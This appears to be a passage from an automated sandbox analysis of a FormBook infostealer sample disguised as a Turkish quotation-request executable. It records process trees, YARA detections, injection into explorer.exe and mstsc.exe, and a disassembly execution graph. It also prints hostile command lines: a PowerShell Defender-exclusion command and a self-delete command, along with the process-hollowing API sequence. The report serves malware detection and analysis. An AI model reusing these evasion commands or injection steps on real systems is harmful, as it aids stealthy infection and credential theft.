                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
                                                                                                            Imagebase:0x90000
                                                                                                            File size:433'152 bytes
                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:4
                                                                                                            Start time:06:28:28
                                                                                                            Start date:05/11/2024
                                                                                                            Path:C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
                                                                                                            Imagebase:0xfc0000
                                                                                                            File size:743'936 bytes
                                                                                                            MD5 hash:88153AC6837F5034A7AB44259C90F4DD
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                            • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000004.00000002.1623721118.00000000011EF000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:5
                                                                                                            Start time:06:28:28
                                                                                                            Start date:05/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:6
                                                                                                            Start time:06:28:29
                                                                                                            Start date:05/11/2024
                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                                            Imagebase:0x7ff62d7d0000
                                                                                                            File size:5'141'208 bytes
                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000006.00000002.2823254798.000000000DEC4000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:7
                                                                                                            Start time:06:28:30
                                                                                                            Start date:05/11/2024
                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                            Imagebase:0x7ff605670000
                                                                                                            File size:496'640 bytes
                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:8
                                                                                                            Start time:06:28:33
                                                                                                            Start date:05/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\mstsc.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\mstsc.exe"
                                                                                                            Imagebase:0x770000
                                                                                                            File size:1'264'640 bytes
                                                                                                            MD5 hash:EA4A02BE14C405327EEBA8D9AD2BD42C
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:9
                                                                                                            Start time:06:28:36
                                                                                                            Start date:05/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:/c del "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
                                                                                                            Imagebase:0xa40000
                                                                                                            File size:236'544 bytes
                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:10
                                                                                                            Start time:06:28:36
                                                                                                            Start date:05/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:11%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:5%
                                                                                                              Total number of Nodes:202
                                                                                                              Total number of Limit Nodes:14
                                                                                                              execution_graph 37641 9108370 37642 91084fb 37641->37642 37644 9108396 37641->37644 37644->37642 37645 91046c0 37644->37645 37646 91085f0 PostMessageW 37645->37646 37647 910865c 37646->37647 37647->37644 37606 2f3ad30 37610 2f3ae19 37606->37610 37615 2f3ae28 37606->37615 37607 2f3ad3f 37611 2f3ae5c 37610->37611 37612 2f3ae39 37610->37612 37611->37607 37612->37611 37613 2f3b060 GetModuleHandleW 37612->37613 37614 2f3b08d 37613->37614 37614->37607 37616 2f3ae39 37615->37616 37617 2f3ae5c 37615->37617 37616->37617 37618 2f3b060 GetModuleHandleW 37616->37618 37617->37607 37619 2f3b08d 37618->37619 37619->37607 37817 2f3d0c0 37818 2f3d106 37817->37818 37822 2f3d699 37818->37822 37825 2f3d6a8 37818->37825 37819 2f3d1f3 37823 2f3d6d6 37822->37823 37828 2f3d2fc 37822->37828 37823->37819 37826 2f3d2fc DuplicateHandle 37825->37826 37827 2f3d6d6 37826->37827 37827->37819 37829 2f3d710 DuplicateHandle 37828->37829 37830 2f3d7a6 37829->37830 37830->37823 37648 91062f5 37652 9107130 37648->37652 37658 9107120 37648->37658 37649 9106210 37653 9107145 37652->37653 37664 9107170 37653->37664 37678 91071d6 37653->37678 37693 9107160 37653->37693 37654 9107157 37654->37649 37659 9107145 37658->37659 37661 9107170 12 API calls 37659->37661 37662 9107160 12 API calls 37659->37662 37663 91071d6 12 API calls 37659->37663 37660 9107157 37660->37649 37661->37660 37662->37660 37663->37660 37665 910718a 37664->37665 37707 91074a0 37665->37707 37713 910778f 37665->37713 37717 91076fe 37665->37717 37724 9107818 37665->37724 37728 91077d6 37665->37728 37733 9107584 37665->37733 37739 9107734 37665->37739 37744 9107753 37665->37744 37749 9107fd2 37665->37749 37754 9107862 37665->37754 37762 9107491 37665->37762 37666 9107192 37666->37654 37679 9107164 37678->37679 37681 91071d9 37678->37681 37682 91074a0 2 API calls 37679->37682 37683 9107491 2 API calls 37679->37683 37684 9107862 4 API calls 37679->37684 37685 9107fd2 2 API calls 37679->37685 37686 9107753 2 API calls 37679->37686 37687 9107734 2 API calls 37679->37687 37688 9107584 2 API calls 37679->37688 37689 91077d6 2 API calls 37679->37689 37690 9107818 2 API calls 37679->37690 37691 91076fe 4 API calls 37679->37691 37692 910778f 2 API calls 37679->37692 37680 9107192 37680->37654 37682->37680 37683->37680 37684->37680 37685->37680 37686->37680 37687->37680 37688->37680 37689->37680 37690->37680 37691->37680 37692->37680 37694 910718a 37693->37694 37696 91074a0 2 API calls 37694->37696 37697 9107491 2 API calls 37694->37697 37698 9107862 4 API calls 37694->37698 37699 9107fd2 2 API calls 37694->37699 37700 9107753 2 API calls 37694->37700 37701 9107734 2 API calls 37694->37701 37702 9107584 2 API calls 37694->37702 37703 91077d6 2 API calls 37694->37703 37704 9107818 2 API calls 37694->37704 37705 91076fe 4 API calls 37694->37705 37706 910778f 2 API calls 37694->37706 37695 9107192 37695->37654 37696->37695 37697->37695 37698->37695 37699->37695 37700->37695 37701->37695 37702->37695 37703->37695 37704->37695 37705->37695 37706->37695 37709 91074d3 37707->37709 37708 910755d 37708->37666 37709->37708 37769 9105d94 37709->37769 37773 9105da0 37709->37773 37777 9105980 37713->37777 37781 9105978 37713->37781 37714 91077a9 37785 9105a51 37717->37785 37789 9105a58 37717->37789 37718 910771f 37793 9105b10 37718->37793 37797 9105b18 37718->37797 37719 91076e9 37719->37666 37726 9105b10 WriteProcessMemory 37724->37726 37727 9105b18 WriteProcessMemory 37724->37727 37725 910783c 37726->37725 37727->37725 37729 91077fc 37728->37729 37801 91058d0 37729->37801 37805 91058c8 37729->37805 37730 9108052 37735 910758d 37733->37735 37734 910755d 37734->37666 37735->37734 37737 9105da0 CreateProcessA 37735->37737 37738 9105d94 CreateProcessA 37735->37738 37736 91076be 37736->37666 37737->37736 37738->37736 37740 910773a 37739->37740 37742 91058d0 ResumeThread 37740->37742 37743 91058c8 ResumeThread 37740->37743 37741 9108052 37742->37741 37743->37741 37745 9107763 37744->37745 37747 9105b10 WriteProcessMemory 37745->37747 37748 9105b18 WriteProcessMemory 37745->37748 37746 9107d5c 37746->37666 37747->37746 37748->37746 37750 9107fd8 37749->37750 37809 9105c01 37750->37809 37813 9105c08 37750->37813 37751 9107ffb 37760 9105980 Wow64SetThreadContext 37754->37760 37761 9105978 Wow64SetThreadContext 37754->37761 37755 9107bfa 37755->37666 37756 910774b 37756->37755 37758 91058d0 ResumeThread 37756->37758 37759 91058c8 ResumeThread 37756->37759 37757 9108052 37758->37757 37759->37757 37760->37756 37761->37756 37763 9107462 37762->37763 37765 910749e 37762->37765 37763->37666 37764 910755d 37764->37666 37765->37764 37767 9105da0 CreateProcessA 37765->37767 37768 9105d94 CreateProcessA 37765->37768 37766 91076be 37766->37666 37767->37766 37768->37766 37770 9105e29 CreateProcessA 37769->37770 37772 9105feb 37770->37772 37774 9105e29 CreateProcessA 37773->37774 37776 9105feb 37774->37776 37778 91059b3 Wow64SetThreadContext 37777->37778 37780 9105a0d 37778->37780 37780->37714 37782 910597e Wow64SetThreadContext 37781->37782 37784 9105a0d 37782->37784 37784->37714 37786 9105a58 VirtualAllocEx 37785->37786 37788 9105ad5 37786->37788 37788->37718 37790 9105a98 VirtualAllocEx 37789->37790 37792 9105ad5 37790->37792 37792->37718 37794 9105b18 WriteProcessMemory 37793->37794 37796 9105bb7 37794->37796 37796->37719 37798 9105b60 WriteProcessMemory 37797->37798 37800 9105bb7 37798->37800 37800->37719 37802 9105910 ResumeThread 37801->37802 37804 9105941 37802->37804 37804->37730 37806 91058d1 ResumeThread 37805->37806 37808 9105941 37806->37808 37808->37730 37810 9105c08 ReadProcessMemory 37809->37810 37812 9105c97 37810->37812 37812->37751 37814 9105c53 ReadProcessMemory 37813->37814 37816 9105c97 37814->37816 37816->37751 37620 2f34668 37621 2f3467a 37620->37621 37622 2f34686 37621->37622 37624 2f34779 37621->37624 37625 2f3479d 37624->37625 37629 2f34879 37625->37629 37633 2f34888 37625->37633 37630 2f348af 37629->37630 37631 2f3498c 37630->37631 37637 2f344b4 37630->37637 37634 2f348af 37633->37634 37635 2f344b4 CreateActCtxA 37634->37635 37636 2f3498c 37634->37636 37635->37636 37638 2f35918 CreateActCtxA 37637->37638 37640 2f359db 37638->37640 37831 122d01c 37832 122d034 37831->37832 37833 122d08e 37832->37833 37836 5652808 37832->37836 37841 5652818 37832->37841 37837 5652845 37836->37837 37838 5652877 37837->37838 37846 5652990 37837->37846 37850 56529a0 37837->37850 37842 5652845 37841->37842 37843 5652877 37842->37843 37844 56529a0 2 API calls 37842->37844 37845 5652990 2 API calls 37842->37845 37844->37843 37845->37843 37848 56529b4 37846->37848 37847 5652a40 37847->37838 37854 5652a58 37848->37854 37852 56529b4 37850->37852 37851 5652a40 37851->37838 37853 5652a58 2 API calls 37852->37853 37853->37851 37855 5652a69 37854->37855 37857 5654013 37854->37857 37855->37847 37861 5654040 37857->37861 37865 5654030 37857->37865 37858 565402a 37858->37855 37862 5654082 37861->37862 37864 5654089 37861->37864 37863 56540da CallWindowProcW 37862->37863 37862->37864 37863->37864 37864->37858 37866 5654082 37865->37866 37867 5654089 37865->37867 37866->37867 37868 56540da CallWindowProcW 37866->37868 37867->37858 37868->37867

                                                                                                              Executed Functions

                                                                                                              Function 056570E8 Relevance: .9, Instructions: 913COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1558402839.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_5650000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 90896ebed81f9a0d05b2e032669c912bc753bd75ebf5dc29ba62d49683a16214
                                                                                                              • Instruction ID: 37635350472c6c386ab9f2883955af1875a0cba500fcab36fef1f2a2c242a90e
                                                                                                              • Opcode Fuzzy Hash: 90896ebed81f9a0d05b2e032669c912bc753bd75ebf5dc29ba62d49683a16214
                                                                                                              • Instruction Fuzzy Hash: A7A2C134A512598FCB55DF68C894AD9B7B2FF89310F5085E9E80DAB360DB31AE85CF40
                                                                                                              Function 056570D8 Relevance: .9, Instructions: 911COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1558402839.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_5650000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 84901cbe0e28994e2a1b9a35016060ea8356cbf0f3cced24aabb971e41af9ce4
                                                                                                              • Instruction ID: 62bc29a55b9319f09159c79bc594706db302fafa2ed6e4d27f2181d43c7e5367
                                                                                                              • Opcode Fuzzy Hash: 84901cbe0e28994e2a1b9a35016060ea8356cbf0f3cced24aabb971e41af9ce4
                                                                                                              • Instruction Fuzzy Hash: ACA2B034A512598FCB55DF64C894AD9B7B2FF89310F5085E9E80DAB360DB31AE85CF40
                                                                                                              Function 091097D0 Relevance: .6, Instructions: 599COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2bd306a22826c14b969bfec7ea9101f50b3744cfc11836df6b922a8fddc8c477
                                                                                                              • Instruction ID: fbb9fed316ee0c41b98e3258bd3492016944cda727f4bb5896be9dfe5663dcd8
                                                                                                              • Opcode Fuzzy Hash: 2bd306a22826c14b969bfec7ea9101f50b3744cfc11836df6b922a8fddc8c477
                                                                                                              • Instruction Fuzzy Hash: 40228C30B012048FDB19DF69C960BAEB7F6AFC8748F248469E5469B395CB76DD01CB90
                                                                                                              Function 091074A0 Relevance: .2, Instructions: 172COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0d8ebbacb8ff26cbbeeba1b880848482f2a75c0b7557072fe302c85ea0c7e696
                                                                                                              • Instruction ID: 98a2fa82e5ff7e5d44f987940485ec63b138c1d80f74383a94bb3cfbf41656d0
                                                                                                              • Opcode Fuzzy Hash: 0d8ebbacb8ff26cbbeeba1b880848482f2a75c0b7557072fe302c85ea0c7e696
                                                                                                              • Instruction Fuzzy Hash: 03710775E04219CBDB28CF66CC507E9BBB6BF89304F14D1AAD409A6291EBB15A85CF40
                                                                                                              Function 09100011 Relevance: .1, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7c161cd7e3fa07dcc82e56b2d8a1ce7ac4e45e0f3b4e5f6faee40a3567185bbc
                                                                                                              • Instruction ID: 16f29c88f5c20ea405ef087827f8c4688bb9ea2fda13da750fee5984b7e99b41
                                                                                                              • Opcode Fuzzy Hash: 7c161cd7e3fa07dcc82e56b2d8a1ce7ac4e45e0f3b4e5f6faee40a3567185bbc
                                                                                                              • Instruction Fuzzy Hash: B2214FB1D052488FEB19CFA6C95439EBFF6AFCA304F08C0AAD448A6255DBB50549CF90
                                                                                                              Function 09105D94 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 9105d94-9105e35 2 9105e37-9105e41 0->2 3 9105e6e-9105e8e 0->3 2->3 4 9105e43-9105e45 2->4 8 9105e90-9105e9a 3->8 9 9105ec7-9105ef6 3->9 6 9105e47-9105e51 4->6 7 9105e68-9105e6b 4->7 10 9105e53 6->10 11 9105e55-9105e64 6->11 7->3 8->9 12 9105e9c-9105e9e 8->12 19 9105ef8-9105f02 9->19 20 9105f2f-9105fe9 CreateProcessA 9->20 10->11 11->11 13 9105e66 11->13 14 9105ea0-9105eaa 12->14 15 9105ec1-9105ec4 12->15 13->7 17 9105eac 14->17 18 9105eae-9105ebd 14->18 15->9 17->18 18->18 21 9105ebf 18->21 19->20 22 9105f04-9105f06 19->22 31 9105ff2-9106078 20->31 32 9105feb-9105ff1 20->32 21->15 24 9105f08-9105f12 22->24 25 9105f29-9105f2c 22->25 26 9105f14 24->26 27 9105f16-9105f25 24->27 25->20 26->27 27->27 28 9105f27 27->28 28->25 42 9106088-910608c 31->42 43 910607a-910607e 31->43 32->31 44 910609c-91060a0 42->44 45 910608e-9106092 42->45 43->42 46 9106080 43->46 48 91060b0-91060b4 44->48 49 91060a2-91060a6 44->49 45->44 47 9106094 45->47 46->42 47->44 51 91060c6-91060cd 48->51 52 91060b6-91060bc 48->52 49->48 50 91060a8 49->50 50->48 53 91060e4 51->53 54 91060cf-91060de 51->54 52->51 55 91060e5 53->55 54->53 55->55
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09105FD6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: e2259600fbecad4a3f7e37efb7b3070564fe4bae46d5f9290fb920204637e0f1
                                                                                                              • Instruction ID: aa88b075e54b7bd4767b46f4a1a502c1d845cde968298d8faff62ce39f361b08
                                                                                                              • Opcode Fuzzy Hash: e2259600fbecad4a3f7e37efb7b3070564fe4bae46d5f9290fb920204637e0f1
                                                                                                              • Instruction Fuzzy Hash: ADA19E70E00319CFEB10CF69C8517EEBBB2BF88304F048569E849A7284DB769995CF91
                                                                                                              Function 09105DA0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 57 9105da0-9105e35 59 9105e37-9105e41 57->59 60 9105e6e-9105e8e 57->60 59->60 61 9105e43-9105e45 59->61 65 9105e90-9105e9a 60->65 66 9105ec7-9105ef6 60->66 63 9105e47-9105e51 61->63 64 9105e68-9105e6b 61->64 67 9105e53 63->67 68 9105e55-9105e64 63->68 64->60 65->66 69 9105e9c-9105e9e 65->69 76 9105ef8-9105f02 66->76 77 9105f2f-9105fe9 CreateProcessA 66->77 67->68 68->68 70 9105e66 68->70 71 9105ea0-9105eaa 69->71 72 9105ec1-9105ec4 69->72 70->64 74 9105eac 71->74 75 9105eae-9105ebd 71->75 72->66 74->75 75->75 78 9105ebf 75->78 76->77 79 9105f04-9105f06 76->79 88 9105ff2-9106078 77->88 89 9105feb-9105ff1 77->89 78->72 81 9105f08-9105f12 79->81 82 9105f29-9105f2c 79->82 83 9105f14 81->83 84 9105f16-9105f25 81->84 82->77 83->84 84->84 85 9105f27 84->85 85->82 99 9106088-910608c 88->99 100 910607a-910607e 88->100 89->88 101 910609c-91060a0 99->101 102 910608e-9106092 99->102 100->99 103 9106080 100->103 105 91060b0-91060b4 101->105 106 91060a2-91060a6 101->106 102->101 104 9106094 102->104 103->99 104->101 108 91060c6-91060cd 105->108 109 91060b6-91060bc 105->109 106->105 107 91060a8 106->107 107->105 110 91060e4 108->110 111 91060cf-91060de 108->111 109->108 112 91060e5 110->112 111->110 112->112
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09105FD6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: 7e584e58e4926e9e7cb5cc44359b7b7c30880b15a8d497390f6de5c0f7aafb64
                                                                                                              • Instruction ID: 686cbe2899c13a4986b437e229c75a2927fbb630381d1c9cbf078bdb8cf6c27c
                                                                                                              • Opcode Fuzzy Hash: 7e584e58e4926e9e7cb5cc44359b7b7c30880b15a8d497390f6de5c0f7aafb64
                                                                                                              • Instruction Fuzzy Hash: 2E918B71E00319CFEB10CF69C8517DEBBB2BF88314F048569E849A7284DBB69995CF91
                                                                                                              Function 02F3AE28 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
